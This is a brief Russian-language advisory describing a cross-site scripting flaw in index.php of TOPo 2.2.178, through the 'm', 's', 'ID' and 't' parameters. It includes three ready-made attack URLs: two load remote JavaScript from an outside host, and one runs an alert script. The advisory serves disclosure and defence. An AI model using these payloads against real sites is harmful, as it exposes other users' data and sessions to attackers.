Программа: TOPo 2.2.178

Уязвимость позволяет удаленному
пользователю произвести XSS нападение и
получить доступ к потенциально важным
данным других пользователей. Уязвимость
существует в сценарии index.php при обработке
входных данных в параметрах ‘m’, ‘s’, ‘ID’, и ‘t’.
Удаленный пользователю может с помощью
специально сформированного URL выполнить
произвольный HTML сценарий в браузере жертвы
в контексте безопасности уязвимого сайта.

Примеры:

http://[target]/topo/index.php?m=top"><SCRIPT%20src= http://www.drorshalev.com/dev/injection/js.js></script>&s=info&ID=1114815037.2498

http://[target]/topo/index.php?m=top&s=info&ID=1115946293.3552">
<SCRIPT%20src=http://www.drorshalev.com/dev/injection/js.js> </SCRIPT>&t=puntuar

http://[target] /topo/index.php?m=top&s=info"> < script>alert()</script>&ID=1115946293.3552&t=puntuar



Оставить мнение